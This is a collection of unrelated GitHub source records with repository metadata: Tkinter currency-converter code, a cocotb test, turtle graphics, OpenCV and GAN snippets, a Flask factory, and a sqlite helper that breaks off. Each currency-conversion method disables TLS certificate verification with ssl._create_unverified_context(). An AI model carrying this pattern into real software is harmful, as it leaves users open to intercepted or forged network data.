y=265)\n\n        self.again()\n\n    def BRL_to_EUR(self):\n        global user_value26\n        user_ask26 = Label(root, text =\"How many Brazilian Reals? \")\n        user_ask26.place(x=130, y= 225)\n        vcmd = root.register(self.validate)\n        user_value26 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n        user_value26.place(x=370, y=225)\n\n        calcButton26 = Button(self, text=\" Convert \", command=self.cal26)\n        calcButton26.place(x=265, y=450)\n        root.bind(\"\", self.linkCal26)\n    def linkCal26(self, event=None):\n        self.cal26()\n    def cal26(self):\n        context = ssl._create_unverified_context() #allow for unverified link\n        fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n        data = fixerdata.read().decode('utf-8') #Read link\n        parsed = json.loads(data)\n        date = parsed[\"date\"] #import date\n        rates = parsed[\"rates\"] #import rates\n        eur_rate = parsed[\"rates\"][\"EUR\"]\n\n        val26= float(user_value26.get()) * (eur_rate)\n        int(val26)\n\n        x26 = Label(root, text=\"EUR: \")\n        x26.place(x=250, y=265)\n        out26 = Label(root)\n        out26.config(text = '{:0.2f}'.format(val26))\n        out26.place(x=380, y=265)\n\n        self.again()\n\n    def BRL_to_INR(self):\n        global user_value27\n        user_ask27 = Label(root, text =\"How many Brazilian Reals? 
\")\n user_ask27.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value27 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value27.place(x=370, y=225)\n\n calcButton27 = Button(self, text=\" Convert \", command=self.cal27)\n calcButton27.place(x=265, y=450)\n root.bind(\"\", self.linkCal27)\n def linkCal27(self, event=None):\n self.cal27()\n def cal27(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val27= float(user_value27.get()) * (inr_rate)\n int(val27)\n\n x27 = Label(root, text=\"INR: \")\n x27.place(x=250, y=265)\n out27 = Label(root)\n out27.config(text = '{:0.2f}'.format(val27))\n out27.place(x=380, y=265)\n self.again()\n\n def BRL_to_JPY(self):\n global user_value28\n user_ask28 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask28.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value28 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value28.place(x=370, y=225)\n\n calcButton28 = Button(self, text=\" Convert \", command=self.cal28)\n calcButton28.place(x=265, y=450)\n root.bind(\"\", self.linkCal28)\n def linkCal28(self, event=None):\n self.cal28()\n def cal28(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val28= float(user_value28.get()) * (jpy_rate)\n int(val28)\n\n x28 = Label(root, text=\"JPY: \")\n x28.place(x=250, y=265)\n out28 = Label(root)\n out28.config(text = '{:0.2f}'.format(val28))\n out28.place(x=380, y=265)\n self.again()\n\n def BRL_to_GBP(self):\n global user_value34\n user_ask34 = Label(root, text =\"How many Brazilian Reals? \")\n user_ask34.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value34 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value34.place(x=370, y=225)\n\n calcButton34 = Button(self, text=\" Convert \", command=self.cal34)\n calcButton34.place(x=265, y=450)\n root.bind(\"\", self.linkCal34)\n def linkCal34(self, event=None):\n self.cal34()\n def cal34(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n gbp_rate = parsed[\"rates\"][\"GBP\"]\n\n val34= float(user_value34.get()) * (gbp_rate)\n int(val34)\n\n x34 = Label(root, text=\"GBP: \")\n x34.place(x=250, y=265)\n out34 = Label(root)\n out34.config(text = '{:0.2f}'.format(val34))\n out34.place(x=380, y=265)\n\n self.again()\n\n\n def GBP_to_CAD(self):\n global user_value35\n user_ask35 = Label(root, text =\"How many Great Britain Pounds? 
\")\n user_ask35.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value35 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value35.place(x=370, y=225)\n\n calcButton35 = Button(self, text=\" Convert \", command=self.cal35)\n calcButton35.place(x=265, y=450)\n root.bind(\"\", self.linkCal35)\n def linkCal35(self, event=None):\n self.cal35()\n def cal35(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n cad_rate = parsed[\"rates\"][\"CAD\"]\n\n val35= float(user_value35.get()) * (cad_rate)\n int(val35)\n\n x35 = Label(root, text=\"CAD: \")\n x35.place(x=250, y=265)\n out35 = Label(root)\n out35.config(text = '{:0.2f}'.format(val35))\n out35.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_USD(self):\n global user_value36\n user_ask36 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask36.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value36 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value36.place(x=370, y=225)\n\n calcButton36 = Button(self, text=\" Convert \", command=self.cal36)\n calcButton36.place(x=265, y=450)\n root.bind(\"\", self.linkCal36)\n def linkCal36(self, event=None):\n self.cal36()\n def cal36(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n usd_rate = parsed[\"rates\"][\"USD\"]\n\n val36= float(user_value36.get()) * (usd_rate)\n int(val36)\n\n x36 = Label(root, text=\"USD: \")\n x36.place(x=250, y=265)\n out36 = Label(root)\n out36.config(text = '{:0.2f}'.format(val36))\n out36.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_EUR(self):\n global user_value37\n user_ask37 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask37.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value37 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value37.place(x=370, y=225)\n\n calcButton37 = Button(self, text=\" Convert \", command=self.cal37)\n calcButton37.place(x=265, y=450)\n root.bind(\"\", self.linkCal37)\n def linkCal37(self, event=None):\n self.cal37()\n def cal37(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n eur_rate = parsed[\"rates\"][\"EUR\"]\n\n val37= float(user_value37.get()) * (eur_rate)\n int(val37)\n\n x37 = Label(root, text=\"EUR: \")\n x37.place(x=250, y=265)\n out37 = Label(root)\n out37.config(text = '{:0.2f}'.format(val37))\n out37.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_INR(self):\n global user_value38\n user_ask38 = Label(root, text =\"How many Great Britain Pounds? 
\")\n user_ask38.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value38 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value38.place(x=370, y=225)\n\n calcButton38 = Button(self, text=\" Convert \", command=self.cal38)\n calcButton38.place(x=265, y=450)\n root.bind(\"\", self.linkCal38)\n def linkCal38(self, event=None):\n self.cal38()\n def cal38(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n inr_rate = parsed[\"rates\"][\"INR\"]\n\n val38= float(user_value38.get()) * (inr_rate)\n int(val38)\n\n x38 = Label(root, text=\"INR: \")\n x38.place(x=250, y=265)\n out38 = Label(root)\n out38.config(text = '{:0.2f}'.format(val38))\n out38.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_JPY(self):\n global user_value39\n user_ask39 = Label(root, text =\"How many Great Britain Pounds? \")\n user_ask39.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value39 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value39.place(x=370, y=225)\n\n calcButton39 = Button(self, text=\" Convert \", command=self.cal39)\n calcButton39.place(x=265, y=450)\n root.bind(\"\", self.linkCal39)\n def linkCal39(self, event=None):\n self.cal39()\n def cal39(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n jpy_rate = parsed[\"rates\"][\"JPY\"]\n\n val39= float(user_value39.get()) * (jpy_rate)\n int(val39)\n\n x39 = Label(root, text=\"JPY: \")\n x39.place(x=250, y=265)\n out39 = Label(root)\n out39.config(text = '{:0.2f}'.format(val39))\n out39.place(x=380, y=265)\n\n self.again()\n\n def GBP_to_BRL(self):\n global user_value40\n user_ask40 = Label(root, text =\"How many Great Britain Pounds? 
\")\n user_ask40.place(x=130, y= 225)\n vcmd = root.register(self.validate)\n user_value40 = Entry(root, validate = \"key\", validatecommand=(vcmd, \"%P\"))\n user_value40.place(x=370, y=225)\n\n calcButton40 = Button(self, text=\" Convert \", command=self.cal40)\n calcButton40.place(x=265, y=450)\n root.bind(\"\", self.linkCal40)\n def linkCal40(self, event=None):\n self.cal40()\n def cal40(self):\n context = ssl._create_unverified_context() #allow for unverified link\n fixerdata = ur.urlopen(\"https://api.fixer.io/latest?base={}\".format(conget.get()), context=context)\n\n data = fixerdata.read().decode('utf-8') #Read link\n parsed = json.loads(data)\n date = parsed[\"date\"] #import date\n rates = parsed[\"rates\"] #import rates\n brl_rate = parsed[\"rates\"][\"BRL\"]\n\n val40= float(user_value40.get()) * (brl_rate)\n int(val40)\n\n x40 = Label(root, text=\"BRL: \")\n x40.place(x=250, y=265)\n out40 = Label(root)\n out40.config(text = '{:0.2f}'.format(val40))\n out40.place(x=380, y=265)\n\n self.again()\n \n def validate(self, new_text): #currency value validation (float --> vcmd)\n if new_text == \"-\":\n return True\n elif not new_text:\n return True\n\n try:\n self.entered_number=float(new_text)\n return True\n except ValueError:\n return False\n \n def app_exit(self): #Exit app\n exit()\n\n def endingTitle(self): #Ending title\n endTitle = Label(self, text=\"Thank you for using Currency Converter\")\n endTitle.place(x=200, y=335)\n subTitle = Label(self, text=\"Presented by Brownies Converters\")\n subTitle.place(x=220, y=370)\n lastTitle = Label(self, text=\"App will close in 3 seconds...\")\n lastTitle.place(x=235, y=400)\n \n root.after(1000, self.lastTitle2)\n root.after(2000, self.lastTitle3)\n root.after(3000, self.app_exit)\n def lastTitle2(self):\n lastTitle = Label(self, text=\"App will close in 2 seconds...\")\n lastTitle.place(x=235, y=400)\n def lastTitle3(self):\n lastTitle = Label(self, text=\"App will close in 1 seconds...\")\n lastTitle.place(x=235, y=400)\n\nroot.geometry(\"650x500\") #Display size\napp = mainWindow(root)\n\nroot.mainloop()\n","repo_name":"rajessen-sanassy/Currency-Converter","sub_path":"Brownies Converter/Converter_2 vFinal.py","file_name":"Converter_2 vFinal.py","file_ext":"py","file_size_in_byte":63921,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"71060977832","text":"from nmigen_cocotb import run\nimport cores_nmigen.utils.matrix as mat\nfrom cores_nmigen.test.interfaces import MatrixStreamDriver\nfrom cores_nmigen.test.matrix_bypass import MatrixInterfaceBypass\nimport pytest\nimport os\n\ntry:\n import cocotb\n from cocotb.triggers import RisingEdge\n from cocotb.clock import Clock\n from cocotb.regression import TestFactory as TF\nexcept:\n pass\n\nCLK_PERIOD_BASE = 100\n\n\n@cocotb.coroutine\ndef init_test(dut):\n dut.rst <= 1\n cocotb.fork(Clock(dut.clk, 10, 'ns').start())\n yield RisingEdge(dut.clk)\n dut.rst <= 0\n yield RisingEdge(dut.clk)\n\ndef incremental_matrix(shape, size):\n data = []\n count = 0\n for i in range(size):\n matrix = mat.create_empty_matrix(shape)\n for idx in mat.matrix_indexes(shape):\n mat.set_matrix_element(matrix, idx, count)\n count += 1\n data.append(matrix)\n return data\n\n\n@cocotb.coroutine\ndef check_data(dut, shape, dummy=0):\n \n test_size = 20\n yield init_test(dut)\n\n m_axis = MatrixStreamDriver(dut, name='input_', clock=dut.clk, shape=shape)\n s_axis = MatrixStreamDriver(dut, name='output_', clock=dut.clk, shape=shape)\n 
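# Note (assumed intent; the MatrixStreamDriver sources are not part of this record): the two init_*() calls below are taken to park the matrix-stream handshake signals at their idle defaults before any transfer, so the DUT samples no spurious beat once reset is released.\n    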
m_axis.init_sink()\n s_axis.init_source()\n\n yield RisingEdge(dut.clk)\n\n wr_data = incremental_matrix(shape, test_size)\n expected_output_length = len(wr_data)\n\n cocotb.fork(m_axis.monitor())\n cocotb.fork(s_axis.monitor())\n cocotb.fork(s_axis.recv(expected_output_length, burps=False))\n\n yield m_axis.send(wr_data, burps=False)\n\n while len(s_axis.buffer) < len(m_axis.buffer):\n yield RisingEdge(dut.clk)\n\n dut._log.info(f'Buffer in length: {len(m_axis.buffer)}.')\n dut._log.info(f'Buffer out length: {len(s_axis.buffer)}.')\n \n assert len(s_axis.buffer) == expected_output_length, f'{len(s_axis.buffer)} != {expected_output_length}'\n assert m_axis.buffer == s_axis.buffer, f'{m_axis.buffer} == {s_axis.buffer}'\n\n\ntry:\n string_to_tuple = lambda string: tuple([int(i) for i in string.replace('(', '').replace(')', '').split(',')])\n running_cocotb = True\n shape = string_to_tuple(os.environ['coco_param_shape'])\nexcept KeyError as e:\n running_cocotb = False\n\nif running_cocotb:\n tf_test_data = TF(check_data)\n tf_test_data.add_option('shape', [shape])\n tf_test_data.generate_tests()\n\n\n@pytest.mark.timeout(10)\n@pytest.mark.parametrize(\"width, shape\", [(8, (4,2)),\n (8, (4,3,2)),\n ])\ndef test_matrix_interface(width, shape):\n os.environ['coco_param_shape'] = str(shape)\n core = MatrixInterfaceBypass(width=width,\n shape=shape\n )\n ports = core.get_ports()\n printable_shape = '_'.join([str(i) for i in shape])\n vcd_file = f'./test_matrix_interface_i{width}_shape{printable_shape}.vcd'\n run(core, 'cores_nmigen.test.test_matrix_interface', ports=ports, vcd_file=vcd_file)\n","repo_name":"akukulanski/cores-nmigen","sub_path":"cores_nmigen/test/test_matrix_interface.py","file_name":"test_matrix_interface.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"6661999328","text":"from turtle import Turtle\r\n\r\nt = Turtle()\r\n\r\nt.width(1)\r\n\r\nside = 10\r\n\r\nwidth = 11\r\n\r\nheight = 9\r\n\r\nwhite, black, grey, pink, transparent = \"white\", \"black\", \"#EEF4F4\", \"#FF686C\", \"#ADD8E6\"\r\n\r\nt.speed(500)\r\n\r\n#bgcolor won't work, bug?\r\n\r\nt.color(\"#ADD8E6\")\r\n\r\n#couldnt really use a loop here. 
or i was just too lazy to\r\n#think, not sure on that one\r\n\r\n#i would have used bgcolor but it wouldnt work for some\r\n#reason.\r\n\r\nt.begin_fill()\r\nt.left(90)\r\nt.setpos(260, 420)\r\nt.left(90)\r\nt.forward(260 * 2)\r\nt.left(90)\r\nt.forward(1200)\r\nt.left(90)\r\nt.forward(260 * 2)\r\nt.left(90)\r\nt.forward(1200)\r\nt.end_fill()\r\nt.setposition(-(width * (side/2)), height * (side/2))\r\n\r\nt.right(90)\r\n\r\ndef row(pixels):\r\n for (color, count) in pixels:\r\n t.color(color)\r\n for j in range(count):\r\n t.begin_fill()\r\n for k in range(4):\r\n t.forward(side)\r\n t.right(90)\r\n t.end_fill()\r\n t.forward(side)\r\n t.penup()\r\n t.back(width * side)\r\n t.right(90)\r\n t.forward(side)\r\n t.left(90)\r\n t.pendown()\r\nt.speed(50)\r\n \r\nrow([(transparent, 1), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1)])\r\nrow([(transparent, 5), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1), (white, 1)])\r\nrow([(transparent, 4), (white, 1), (white, 1), (black, 1), (white, 1), (black, 1), (white, 1), (white, 1)])\r\nrow([(transparent, 4), (white, 7)])\r\nrow([(transparent, 5), (white, 2), (black, 1), (white, 2), (grey, 1), (white, 3)])\r\nrow([(transparent, 2), (grey, 1), (white, 1), (pink, 1), (white, 1), (grey, 1), (white, 5)])\r\nrow([(transparent, 1), (white, 1), (grey, 3), (white, 5)])\r\nrow([(transparent, 2), (white, 9)])\r\nrow([(transparent, 3), (white, 1), (transparent, 1), (white, 1), (transparent, 2), (white, 1), (transparent, 1), (white, 1)])\r\nt.ht()","repo_name":"brendanstuff/wisconsin","sub_path":"pixelart.py","file_name":"pixelart.py","file_ext":"py","file_size_in_byte":1842,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"20186827236","text":"import cv2\nimport numpy as np\n\ndef filterBilateral():\n src = cv2.imread(\"images/cat.bmp\", cv2.IMREAD_GRAYSCALE)\n\n if src is None :\n return \n\n noise = np.zeros(src.shape, np.int32)\n cv2.randn(noise, 0, 5)\n src = cv2.add(src, noise, dtype=cv2.CV_8UC1)\n\n dst1 = cv2.GaussianBlur(src, (0,0), 5)\n dst2 = cv2.bilateralFilter(src, -1, 10, 5)\n\n cv2.imshow(\"src\", src)\n cv2.imshow(\"dst1\", dst1)\n cv2.imshow(\"dst2\", dst2)\n\n cv2.waitKey()\n cv2.destroyAllWindows()\n\nfilterBilateral()","repo_name":"laply/studyopencv","sub_path":"start to book/filterring/bilateral.py","file_name":"bilateral.py","file_ext":"py","file_size_in_byte":514,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"36964163557","text":"from flask import Flask, render_template\nimport os\nimport models\n\n# This method is run when \"flask run\" is run from the command line\ndef create_app(test_config=None):\n # create and configure the app\n app = Flask(__name__, instance_relative_config=True)\n \n # Load secret keys from instance/config.py file\n app.config.from_pyfile('config.py')\n\n # Tell flask what config file and class to load via .env variable in config.py\n app.config.from_object(os.environ['APP_SETTINGS'])\n\n app.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\n\n models.db.init_app(app)\n\n from models import User, Food\n\n with app.app_context():\n # models.db.drop_all()\n models.db.create_all()\n\n # if test_config is None:\n # # load the instance config, if it exists, when not testing\n # app.config.from_pyfile('config.py', silent=True)\n # else:\n # # load the test config if passed in\n # app.config.from_mapping(test_config)\n\n # ensure the instance folder exists\n 
try:\n os.makedirs(app.instance_path)\n except OSError:\n pass\n\n import auth\n app.register_blueprint(auth.bp)\n\n import food\n app.register_blueprint(food.bp)\n\n return app","repo_name":"tliss/freshi-app","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1215,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"27752134818","text":"import sys\r\ninput = sys.stdin.readline\r\n\r\nT = int(input())\r\nfor __ in range(T):\r\n ans = 0\r\n n = int(input())\r\n dic = {} # idx, cnt\r\n S = list(input().strip())\r\n for i in range(n):\r\n s = S[i]\r\n if s in dic:\r\n if i-dic[s][0] > 1:\r\n ans += dic[s][1]*((i-dic[s][0]-1)*5)\r\n dic[s][0] = i\r\n dic[s][1] += 1\r\n else:\r\n dic[s] = [i,1]\r\n print(ans)","repo_name":"nube-net/baekjoon-nube-net-gytjdttop-","sub_path":"백준/Gold/3655. 먼저 가세요/먼저 가세요.py","file_name":"먼저 가세요.py","file_ext":"py","file_size_in_byte":437,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"30777876222","text":"import os\nimport glob\nimport cv2\nimport pandas as pd\nimport random\n\ndef make_dir(path):\n if not os.path.isdir(path):\n os.mkdir(path)\n\ndef make_image(data_path, video_path, label_name, index=0, save_seq=50):\n # Make Dir\n make_dir(path=os.path.join(data_path, label_name))\n\n # Make Image Data\n cap = cv2.VideoCapture(video_path)\n\n while True:\n\n ret, frame = cap.read()\n index += 1\n\n if index % 10000 == 0:\n print('>>> Index {} Save'.format(index))\n\n if not ret:\n print('>>> Save Image | {}'.format(label_name))\n print('>>> Final Index is | {}'.format(index))\n cap.release()\n break\n\n if index % save_seq == 0:\n label_path = os.path.join(data_path, label_name, str(label_name) + '_' + str(index) + '.png')\n cv2.imwrite(label_path, frame)\n\n return index\n\nif __name__ == '__main__':\n\n # Data Path\n data_path = os.path.join(os.getcwd().split('/src')[0], 'datasets')\n\n # Find Video Data\n video_list = glob.glob(os.path.join(data_path, '*.mp4'))\n video_path = video_list[0]\n\n # Main\n idx = make_image(data_path=data_path, video_path=video_list[0], label_name='inf')\n make_image(data_path=data_path, video_path=video_list[1], label_name='inf', index=idx+1)\n make_image(data_path=data_path, video_path=video_list[2], label_name='ani', save_seq=20)\n","repo_name":"saeu5407/Styletransfer","sub_path":"src/utils/databuilder.py","file_name":"databuilder.py","file_ext":"py","file_size_in_byte":1404,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"10393128859","text":"import sys\n\nn = int(sys.stdin.readline())\nstack = []\nfor _ in range(n):\n cmd = sys.stdin.readline().strip() #readline() contains line feed\n if cmd == 'pop':\n print(stack.pop() if len(stack) > 0 else -1)\n elif cmd == 'size':\n print(len(stack))\n elif cmd == 'empty':\n print(int(len(stack) == 0))\n elif cmd == 'top':\n print(stack[-1] if len(stack) != 0 else -1)\n else:\n stack.append(cmd[5: ])\n","repo_name":"beyondthemist/Problem-solving-solution","sub_path":"BAEKJOON/10828/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":443,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13542605159","text":"from typing import TYPE_CHECKING\nimport logging\nfrom ezdxf.lldxf.attributes import DXFAttr, DXFAttributes, DefSubclass\nfrom ezdxf.lldxf.const import DXF12, SUBCLASS_MARKER\nfrom 
ezdxf.entities.dxfentity import base_class, SubclassProcessor, DXFEntity\nfrom ezdxf.entities.layer import acdb_symbol_table_record\nfrom .factory import register_entity\n\nlogger = logging.getLogger('ezdxf')\n\nif TYPE_CHECKING:\n    from ezdxf.eztypes import TagWriter, DXFNamespace\n\n__all__ = ['Textstyle']\n\nacdb_style = DefSubclass('AcDbTextStyleTableRecord', {\n    'name': DXFAttr(2, default='Standard'),\n    'flags': DXFAttr(70, default=0),\n    'height': DXFAttr(40, default=0), # fixed height, 0 if not fixed\n    'width': DXFAttr(41, default=1), # width factor\n    'oblique': DXFAttr(50, default=0), # oblique angle in degree, 0 = vertical\n    'generation_flags': DXFAttr(71, default=0), # 2 = backward, 4 = mirrored in Y\n    'last_height': DXFAttr(42, default=2.5), # last height used\n    'font': DXFAttr(3, default='txt'), # primary font file name\n    'bigfont': DXFAttr(4, default=''), # big font name, blank if none\n})\n\n\n@register_entity\nclass Textstyle(DXFEntity):\n    \"\"\" DXF STYLE entity \"\"\"\n    DXFTYPE = 'STYLE'\n    DXFATTRIBS = DXFAttributes(base_class, acdb_symbol_table_record, acdb_style)\n\n    def load_dxf_attribs(self, processor: SubclassProcessor = None) -> 'DXFNamespace':\n        dxf = super().load_dxf_attribs(processor)\n        if processor:\n            tags = processor.load_dxfattribs_into_namespace(dxf, acdb_style)\n            if len(tags) and not processor.r12:\n                processor.log_unprocessed_tags(tags, subclass=acdb_style.name)\n        return dxf\n\n    def export_entity(self, tagwriter: 'TagWriter') -> None:\n        super().export_entity(tagwriter)\n        # AcDbEntity export is done by parent class\n        if tagwriter.dxfversion > DXF12:\n            tagwriter.write_tag2(SUBCLASS_MARKER, acdb_symbol_table_record.name)\n            tagwriter.write_tag2(SUBCLASS_MARKER, acdb_style.name)\n\n        # for all DXF versions\n        self.dxf.export_dxf_attribs(tagwriter, [\n            'name', 'flags', 'height', 'width', 'oblique', 'generation_flags', 'last_height', 'font', 'bigfont'\n        ])\n\n","repo_name":"tapnair/DXFImporter","sub_path":"DXFImporter/lib/ezdxf/entities/textstyle.py","file_name":"textstyle.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"75024361511","text":"from tkinter.ttk import Combobox\nfrom Box_Message import *\nfrom Menu_mode import *\ndef display_model_message(event):\n    Message_box.config(state=tk.NORMAL)\n    Message_box.delete(\"1.0\", \"end\")\n    Message_box.insert(tk.END, model_list.get() + \":\\n\")\n    model_message_info = model_message[model_list.get()]\n    Message_box.insert(tk.END, model_message_info)\n    # Font\n    Message_box.config(font=(font_style, font_size + 4))\n    # Size\n    Message_box.config(width=message_box_size[0], height=message_box_size[1])\n    Message_box.config(state=tk.DISABLED)\n    Message_box.update()\n\n#First, get the current mode\nselected_model = tk.StringVar()\n#Get the current mode\nselected_model.set(mode_dict[selected_mode.get()][0])\n#Create the drop-down box\nmodel_list_list = mode_dict[selected_mode.get()]\nmodel_list = Combobox(\n    window, values=model_list_list\n    , textvariable=selected_model, state=\"readonly\",background=colors[2],foreground=colors[3],\n)\n#Bind event: when the mode changes, update the model list\ndef change_model_list(event):\n    model_list.config(values=mode_dict[selected_mode.get()])\n    model_list.current(0)#set the default value, i.e. select the first entry by default\n# -----------------------------------------------------------------------------------#\n#Bind\nselected_mode.trace(\"w\", lambda *args: change_model_list(None))\n\n\n# Set the Combobox style\nmodel_list.config(width=ComboBox_model_size[0])\nmodel_list.config(font=cbox_font)\n# Set the Combobox 
colors\nmodel_list.config(background=cbox_colors[2], foreground=cbox_colors[3])\nLabel_model = tk.Label(window, text=\"模型:\")\n# Set the Label style\nLabel_model.config(anchor=tk.E)\nLabel_model.config(width=Label_model_size[0], height=Label_model_size[1])\nLabel_model.config(bg=cbox_colors[0], fg=cbox_colors[1], font=cbox_font)\n# Bind event\nmodel_list.bind(\"<<ComboboxSelected>>\", display_model_message)\n\nif __name__ == \"__main__\":\n    Label_model.grid(row=0, column=0, sticky=tk.W)\n    model_list.grid(row=0, column=1, sticky=tk.W)\n    window.mainloop()\n","repo_name":"Code-WSY/GPT-SY","sub_path":"gpt_sy/Cbox_Model.py","file_name":"Cbox_Model.py","file_ext":"py","file_size_in_byte":2008,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"31255316436","text":"import tensorflow as tf\nfrom archs.gan import GAN\nfrom tensorflow.python.keras.models import Input\n\n\nclass AC_GAN(GAN):\n    def __init__(self, ce_weight_generator=0.1, ce_weight_discriminator=1, classify_generated=False, **kwargs):\n        super(AC_GAN, self).__init__(**kwargs)\n        self.ce_weight_generator = ce_weight_generator\n        self.ce_weight_discriminator = ce_weight_discriminator\n        self.classify_generated = classify_generated\n        self.additional_inputs_for_discriminator_train = [Input((1,), dtype='int32')]\n\n    def additional_discriminator_losses(self):\n        losses = []\n        cls_real = self.ce_weight_discriminator * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits\n                                                 (labels=tf.squeeze(self.additional_inputs_for_discriminator_train[0], axis=1),\n                                                  logits=self.discriminator_real_output[1]))\n        self.discriminator_metric_names.append('cls_real')\n        losses.append(cls_real)\n        if self.classify_generated:\n            cls_fake = self.ce_weight_discriminator * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits\n                                                 (labels=tf.squeeze(self.generator_input[1], axis=1), logits=self.discriminator_fake_output[1]))\n            losses.append(cls_fake)\n            self.discriminator_metric_names.append('cls_fake')\n        return losses\n\n    def additional_generator_losses(self):\n        cls_real = self.ce_weight_generator * tf.reduce_mean(tf.nn.sparse_softmax_cross_entropy_with_logits\n                                                 (labels=tf.squeeze(self.generator_input[1], axis=1), logits=self.discriminator_fake_output[1]))\n        self.generator_metric_names.append('cls')\n        return [cls_real]\n","repo_name":"huangleiBuaa/StochasticityBW","sub_path":"SBW_GAN_TF/gan/archs/ac_gan.py","file_name":"ac_gan.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","stars":9,"dataset":"github-code","pt":"72"} +{"seq_id":"41243802918","text":"import sqlite3\nfrom sqlite3 import Error\nfrom .conection import create_conection #with the dot we keep the same package path\n\n#This file contains the queries for the database\n\n\ndef insert_book(data):\n    conn = create_conection()\n    sql = \"\"\" INSERT INTO BOOKS (TITLE, CATEGORY, PAGE_QTY, BOOK_PATH, DESCRIPTION)\n            VALUES(?, ?, ?, ?, ?)\n        \"\"\"\n    try:\n        cur = conn.cursor() #Set up the cursor\n        cur.execute(sql,data)#Pass the query and the data\n        